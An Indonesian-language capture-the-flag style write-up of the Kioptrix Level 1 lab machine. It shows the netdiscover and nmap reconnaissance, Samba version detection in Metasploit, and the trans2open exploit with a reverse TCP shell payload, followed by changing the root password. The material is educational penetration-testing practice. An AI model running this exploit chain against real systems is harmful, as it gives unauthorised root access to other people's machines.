Write-up Kioptrix Level 1

Hai teman-teman, pada artikel kali ini saya akan menulis pembahasan dari Kioptrix Level 1. Kioptrix sendiri adalah Oracle VM Image yang didesain memiliki celah kemanan didalamnya yang sangat rentan akan serangan. Tujuan dari permainan ini adalah mendapatkan akses root dari OS tersebut dengan berbagai cara. Terdapat berbagai cara yang telah didesain untuk mendapatkan akses root tersebut. Dengan menyelesaikan permaianan ini diharapkan dapat membantu dalam mendalami dasar-dasar dari keamanan website dan jaringan. Berikut adalah tahapan-tahapan yang dapat kita jalankan ketika menyelesaikan permainan Kioptrix : Level 1.

Persiapan

Hal pertama yang dilakukan adalah pastikan bahwa kita sudah memiliki dan menginstal VMware. Jika kita belum memilikinya maka bisa download VMware dengan link dibawah ini:

https://www.vmware.com/go/downloadplayer

Setelah itu kita akan download terlebih dahulu virtual machine kioptrix level 1 yang nantinya akan menjadi target kita dalam penyerangan. Kita bisa download dengan link dibawah ini:

https://www.vulnhub.com/entry/kioptrix-level-1-1,22/

Setelah selesai terdownload, kita ekstrak terlebih dahulu filenya lalu kita jalankan file tersebut menggunakan vmware dan pastikan pengaturan untuk Network Adapter adalah Bridged.

Gambar Pengaturan Network Adapter

Ini adalah tampilan awal dari kiptrix level 1 setelah dijalankan. Kita diminta untuk login supaya bisa masuk ke sistemnya padahal kita belum memiliki username dan password untuk login. Disinilah tantangannya, kita diminta untuk mencari celah keamanan dari OS ini supaya bisa masuk ke dalam sistem.

Gambar Tampilan Kioptrix: Level 1

Untuk mendapatkan akses root pada kioptrix , kita bisa menggunakan OS Kali Linux untuk mengeksploitasi VM kioptrix tersebut. Disini OS kali linux saya jalankan menggunakan VMware dengan pengaturan untuk Network Adapter adalah bridged.

Mencari tahu Ip address dari target

Dikarenakan Kali Linux yang kita gunakan dan Kioptrix terdapat dalam satu jaringan maka kita dapat mengetahui ip dari target kita dengan menggunakan tool netdiscover. Cara menjalankan tool ini kita dapat menuliskan perintah dibawah ini pada terminal linux:

[email protected]:~# sudo netdiscover

Gambar Hasil netdiscover

Pada gambar tersebut kita bisa mengetahui IP dari Kioptrix yaitu 192.168.1.104 . Dengan begitu kita sudah mengetahui ip address dari target yang ingin kita cari celah keamanannya.

Pemindaian (Scanning)

Tahap selanjutnya adalah kita menggunakan IP dari target yang kita miliki untuk mengetahui port mana yang terbuka dari sistem tersebut menggunakan tool yang bernama nmap. Caranya adalah dengan menuliskan perintah dibawah ini pada terminal linux:

[email protected]:~# nmap -A -p- 192.168.1.104

Gambar Hasil nmap

Perintah yang kita jalankan memiliki arti bahwa kita akan mengecek port mana sajakah yang terbuka. Dengan begini kita dapat mengetahui port yang terbuka dan dapat mencari celah pada port tersebut. Tapi ternyata informasi yang ingin kita peroleh belum sepenuhnya lengkap. Kita belum mengetahui smb versi berapa yang dijalankan. Dengan menggunakan tool metasploit kita bisa mengecek versi smb yang dijalankan. Caranya adalah dengan mengetikkan perintah berikut ini:

[email protected]:~# msfconsole
msf5 > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > set RHOST 192.168.1.104
msf5 auxiliary(scanner/smb/smb_version) > run

Dengan menjalankan perintah tersebut kita mengetahui bahwa smb nya versi samba 2.2.1a

Gaining Access

Setelah kita mengetahui versi dari smb nya kita coba mencari di google.com apakah ada kerentanan didalam versi tersebut. Kita akan menemukan website rapid7 yang berisi dokumentasi dari celah tersebut dan juga bagaimana memanfaatkan celah tersebut dengan menggunakan tool metasploit. Dibawah ini adalah link dari dokumentasi tersebut:

https://www.rapid7.com/db/modules/exploit/linux/samba/trans2open

Kita mencoba masuk kedalam sistem kioptrix mengguanakan celah keamanan tersebut. Selanjutnya kita menuliskan perintah dibawah ini untuk mendapatkan akses root di dalam siste kioptrix.

[email protected]:~# msfconsole
msf5 > use exploit/linux/samba/trans2open
msf5 exploit(linux/samba/trans2open) > set RHOST 192.168.1.104
msf5 exploit(linux/samba/trans2open) > set payload linux/x86/shell/reverse_tcp
msf5 exploit(linux/samba/trans2open) > exploit

Gambar Tampilan Proses Exploit dan Mengganti Password

Dan ternyata kita sudah masuk sebagai root dengan memanfaatkan celah tersebut. Lalu kita akan mencoba mengganti passwordnya supaya bisa login melalui Kioptrix yang telah kita jalankan di VMware. Dengan begitu kita sudah bisa login pada OS kioptrix dengan password yang telah kita ganti. Setelah kita berhasil login terdapat sebuah pesan tersembunyi di kioptrix tersebut, kita dapat menampilkan pesannya dengan cara mengetikkan perintah dibawah ini:

[[email protected] root]# cat /var/mail/root

Gambar Tampilan Pesan

Akhirnya kita berhasil mendapatkan pesan tersebut. Kioptrix: Level 2 telah menanti untuk kita  cari celah keamanannya. Semoga Writeup Kioptrix Level 1 dapat membantu kita dalam mendalami dasar-dasar dari keamanan website dan jaringan.

Tinggalkan komentar